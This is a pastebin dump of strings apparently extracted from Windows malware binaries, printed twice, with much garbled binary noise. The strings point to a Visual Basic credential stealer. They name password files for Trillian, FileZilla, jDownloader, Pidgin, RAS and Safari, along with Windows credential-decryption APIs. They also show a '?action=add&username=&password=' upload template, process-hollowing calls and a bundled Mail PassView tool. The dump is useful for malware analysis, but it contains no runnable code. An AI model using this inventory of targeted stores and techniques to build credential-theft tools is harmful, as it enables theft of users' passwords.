Guest User

Untitled

a guest
Apr 24th, 2018
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.59 KB | None | 0 0
  1. !This program cannot be run in DOS mode.
  2. MSVBVM60.DLL
  3. EsISQ6XGhVsi6FyhW3iO3rIwoibWly
  4. InternetCloseHandle
  5. WideCharToMultiByte
  6. LocalAlloc
  7. InternetOpenUrlA
  8. SysAllocString
  9. GetVersionExA
  10. SendMessageA
  11. FindWindowA
  12. PostMessageA
  13. FindWindowExA
  14. InternetOpenA
  15. CryptUnprotectData
  16. CredEnumerateW
  17. NetApiBufferFree
  18. LoadLibraryA
  19. CallWindowProcA
  20. GetProcAddress
  21. RtlMoveMemory
  22. NtCurrentTeb
  23. GetLengthSid
  24. LookupAccountNameA
  25. ConvertSidToStringSidA
  26. LsaRetrievePrivateData
  27. LsaOpenPolicy
  28. RegOpenKeyExA
  29. RegCloseKey
  30. RegEnumKeyA
  31. RegQueryValueExA
  32. GetPrivateProfileStringA
  33. \Trillian\users\global\accounts.ini
  34. Account000
  35. www.trillian.im
  36. Software\DownloadManager\Passwords\
  37. EncPassword
  38. GetModuleFileNameW
  39. C:\Windows\SysWOW64\msvbvm60.dll\3
  40. ALLUSERSPROFILE
  41. \Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk
  42. RasDialParams!
  43. L$_RasDefaultCredentials#0
  44. PhoneNumber=
  45. programfiles
  46. \jDownloader\config\database.script
  47. INSERT INTO CONFIG VALUES('AccountController','
  48. jDownloader
  49. \FileZilla\recentservers.xml
  50. HardCore Software For : Public
  51. ?action=add&username=
  52. &password=
  53. computername
  54. &sitename=
  55. Yahoo! Messenger
  56. Y! Messenger
  57. www.yahoo.com
  58. www.hotmail.com
  59. \.purple\accounts.xml
  60. <protocol>
  61. <protocol>prpl-
  62. </protocol>
  63. <password>
  64. </password>
  65. RtlMoveMemory
  66. CreateProcessW
  67. NtUnmapViewOfSection
  68. VirtualAllocEx
  69. NtWriteVirtualMemory
  70. NtGetContextThread
  71. NtSetContextThread
  72. NtResumeThread
  73. szProcessName
  74. MSVBVM60.DLL
  75. MethCallEngine
  76. EVENT_SINK_AddRef
  77. DllFunctionCall
  78. EVENT_SINK_Release
  79. EVENT_SINK_QueryInterface
  80. __vbaExceptHandler
  81. ProcCallEngine
  82. frrn8--iggcw,e_-cpp-NFN-glbcv,nfn
  83. !This program cannot be run in DOS mode.
  84. <VNh@!4=h<
  85. h`QG!e^jIL
  86. i"=1t)(-XZ=8nn_ED
  87. |s$t@;t|L(
  88. bf9Nv<c@ Y|
  89. @e|FPd@?lk
  90. '(()*+,--./0012345667789:;<
  91. HIJKfLMNOPQRfST6XYZfD
  92. [f\]^_`afbcdf
  93. DOsi..P,GH"
  94. M4yKx?X>]@t
  95. Mbaaefghijkl
  96. nWD7acom.apple.Sa
  97. fari'.WebKit2
  98. SELECT ojgin_
  99. url, actio
  100. username_e
  101. BZ?-vwxyz[4b
  102. v format 3
  103. CAPEACHECKEYBEFO4GN
  104. nDLm:.P.Z(
  105. )Q+e4"n-.1
  106. &))**,,//112244
  107. _4TTWWXX[[]]^^aD"
  108. ddgghhkkmmnnppss*
  109. xSubmitURL;Fi
  110. >t4lKeySlot/
  111. icBWSDR_De
  112. ToolZlp32S
  113. l7sOFilExR
  114. nNbin5c>umn
  115. gTHDSAFE=w
  116. )f223372036
  117. g0x%x (Dn{
  118. z`f/m'^ch_
  119. 17:03:50 Z759d5a9
  120. 7be2,3fe8cH7Q0
  121. 6{Op QiTyp
  122. KERNEL32.DLL
  123. ADVAPI32.dll
  124. COMCTL32.dll
  125. comdlg32.dll
  126. msvcrt.dll
  127. SHELL32.dll
  128. USER32.dll
  129. VERSION.dll
  130. LoadLibraryA
  131. GetProcAddress
  132. VirtualProtect
  133. VirtualAlloc
  134. VirtualFree
  135. ExitProcess
  136. RegCloseKey
  137. CoInitialize
  138. SHGetMalloc
  139. VerQueryValueW
  140. !This program cannot be run in DOS mode.
  141. H$T(d<p#G
  142. PddddLHD@dddd<($ dddd
  143. ail PassV]
  144. Moz0la\Prof
  145. comm\EudorDC
  146. AddExpgtHea
  147. Y[\n3y#BDKx
  148. "4</a>/?<pk
  149. sktcglboxf,
  150. ISO-8859--{
  151. SELECT y,
  152. 100-9138-/d1
  153. \C417E2D75
  154. wwwwwwwwwwwwwwp
  155. VS_VERSION_INFO
  156. StringFileInfo
  157. CompanyName
  158. FileDescription
  159. Mail Password Recovery
  160. FileVersion
  161. InternalName
  162. Mail PassView
  163. LegalCopyright
  164. Copyright
  165. 2003 - 2012 Nir Sofer
  166. OriginalFilename
  167. mailpv.exe
  168. ProductName
  169. Mail PassView
  170. ProductVersion
  171. VarFileInfo
  172. Translation
  173. <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="NirSoft" type="win32"></assemblyIdentity><description>NirSoft</description><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency></assembly>PAD
  174. KERNEL32.DLL
  175. ADVAPI32.dll
  176. COMCTL32.dll
  177. comdlg32.dll
  178. msvcrt.dll
  179. RPCRT4.dll
  180. SHELL32.dll
  181. USER32.dll
  182. LoadLibraryA
  183. GetProcAddress
  184. VirtualProtect
  185. VirtualAlloc
  186. VirtualFree
  187. ExitProcess
  188. RegCloseKey
  189. CoInitialize
  190. UuidFromStringA
  191. SHGetMalloc
  192. VS_VERSION_INFO
  193. VarFileInfo
  194. Translation
  195. StringFileInfo
  196. CompanyName
  197. SIMPLY THE WORST
  198. ProductName
  199. FileVersion
  200. ProductVersion
  201. InternalName
  202. OriginalFilename
  203. !This program cannot be run in DOS mode.
  204. MSVBVM60.DLL
  205. EsISQ6XGhVsi6FyhW3iO3rIwoibWly
  206. InternetCloseHandle
  207. WideCharToMultiByte
  208. LocalAlloc
  209. InternetOpenUrlA
  210. SysAllocString
  211. GetVersionExA
  212. SendMessageA
  213. FindWindowA
  214. PostMessageA
  215. FindWindowExA
  216. InternetOpenA
  217. CryptUnprotectData
  218. CredEnumerateW
  219. NetApiBufferFree
  220. LoadLibraryA
  221. CallWindowProcA
  222. GetProcAddress
  223. RtlMoveMemory
  224. NtCurrentTeb
  225. GetLengthSid
  226. LookupAccountNameA
  227. ConvertSidToStringSidA
  228. LsaRetrievePrivateData
  229. LsaOpenPolicy
  230. RegOpenKeyExA
  231. RegCloseKey
  232. RegEnumKeyA
  233. RegQueryValueExA
  234. GetPrivateProfileStringA
  235. \Trillian\users\global\accounts.ini
  236. Account000
  237. www.trillian.im
  238. Software\DownloadManager\Passwords\
  239. EncPassword
  240. GetModuleFileNameW
  241. C:\Windows\SysWOW64\msvbvm60.dll\3
  242. ALLUSERSPROFILE
  243. \Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk
  244. RasDialParams!
  245. L$_RasDefaultCredentials#0
  246. PhoneNumber=
  247. programfiles
  248. \jDownloader\config\database.script
  249. INSERT INTO CONFIG VALUES('AccountController','
  250. jDownloader
  251. \FileZilla\recentservers.xml
  252. HardCore Software For : Public
  253. ?action=add&username=
  254. &password=
  255. computername
  256. &sitename=
  257. Yahoo! Messenger
  258. Y! Messenger
  259. www.yahoo.com
  260. www.hotmail.com
  261. \.purple\accounts.xml
  262. <protocol>
  263. <protocol>prpl-
  264. </protocol>
  265. <password>
  266. </password>
  267. RtlMoveMemory
  268. CreateProcessW
  269. NtUnmapViewOfSection
  270. VirtualAllocEx
  271. NtWriteVirtualMemory
  272. NtGetContextThread
  273. NtSetContextThread
  274. NtResumeThread
  275. szProcessName
  276. MSVBVM60.DLL
  277. MethCallEngine
  278. EVENT_SINK_AddRef
  279. DllFunctionCall
  280. EVENT_SINK_Release
  281. EVENT_SINK_QueryInterface
  282. __vbaExceptHandler
  283. ProcCallEngine
  284. frrn8--iggcw,e_-cpp-NFN-glbcv,nfn
  285. !This program cannot be run in DOS mode.
  286. <VNh@!4=h<
  287. h`QG!e^jIL
  288. i"=1t)(-XZ=8nn_ED
  289. |s$t@;t|L(
  290. bf9Nv<c@ Y|
  291. @e|FPd@?lk
  292. '(()*+,--./0012345667789:;<
  293. HIJKfLMNOPQRfST6XYZfD
  294. [f\]^_`afbcdf
  295. DOsi..P,GH"
  296. M4yKx?X>]@t
  297. Mbaaefghijkl
  298. nWD7acom.apple.Sa
  299. fari'.WebKit2
  300. SELECT ojgin_
  301. url, actio
  302. username_e
  303. BZ?-vwxyz[4b
  304. v format 3
  305. CAPEACHECKEYBEFO4GN
  306. nDLm:.P.Z(
  307. )Q+e4"n-.1
  308. &))**,,//112244
  309. _4TTWWXX[[]]^^aD"
  310. ddgghhkkmmnnppss*
  311. xSubmitURL;Fi
  312. >t4lKeySlot/
  313. icBWSDR_De
  314. ToolZlp32S
  315. l7sOFilExR
  316. nNbin5c>umn
  317. gTHDSAFE=w
  318. )f223372036
  319. g0x%x (Dn{
  320. z`f/m'^ch_
  321. 17:03:50 Z759d5a9
  322. 7be2,3fe8cH7Q0
  323. 6{Op QiTyp
  324. KERNEL32.DLL
  325. ADVAPI32.dll
  326. COMCTL32.dll
  327. comdlg32.dll
  328. msvcrt.dll
  329. SHELL32.dll
  330. USER32.dll
  331. VERSION.dll
  332. LoadLibraryA
  333. GetProcAddress
  334. VirtualProtect
  335. VirtualAlloc
  336. VirtualFree
  337. ExitProcess
  338. RegCloseKey
  339. CoInitialize
  340. SHGetMalloc
  341. VerQueryValueW
  342. !This program cannot be run in DOS mode.
  343. H$T(d<p#G
  344. PddddLHD@dddd<($ dddd
  345. ail PassV]
  346. Moz0la\Prof
  347. comm\EudorDC
  348. AddExpgtHea
  349. Y[\n3y#BDKx
  350. "4</a>/?<pk
  351. sktcglboxf,
  352. ISO-8859--{
  353. SELECT y,
  354. 100-9138-/d1
  355. \C417E2D75
  356. wwwwwwwwwwwwwwp
  357. VS_VERSION_INFO
  358. StringFileInfo
  359. CompanyName
  360. FileDescription
  361. Mail Password Recovery
  362. FileVersion
  363. InternalName
  364. Mail PassView
  365. LegalCopyright
  366. Copyright
  367. 2003 - 2012 Nir Sofer
  368. OriginalFilename
  369. mailpv.exe
  370. ProductName
  371. Mail PassView
  372. ProductVersion
  373. VarFileInfo
  374. Translation
  375. <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="NirSoft" type="win32"></assemblyIdentity><description>NirSoft</description><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency></assembly>PAD
  376. KERNEL32.DLL
  377. ADVAPI32.dll
  378. COMCTL32.dll
  379. comdlg32.dll
  380. msvcrt.dll
  381. RPCRT4.dll
  382. SHELL32.dll
  383. USER32.dll
  384. LoadLibraryA
  385. GetProcAddress
  386. VirtualProtect
  387. VirtualAlloc
  388. VirtualFree
  389. ExitProcess
  390. RegCloseKey
  391. CoInitialize
  392. UuidFromStringA
  393. SHGetMalloc
  394. VS_VERSION_INFO
  395. VarFileInfo
  396. Translation
  397. StringFileInfo
  398. CompanyName
  399. SIMPLY THE WORST
  400. ProductName
  401. FileVersion
  402. ProductVersion
  403. InternalName
  404. OriginalFilename
Add Comment
Please, Sign In to add comment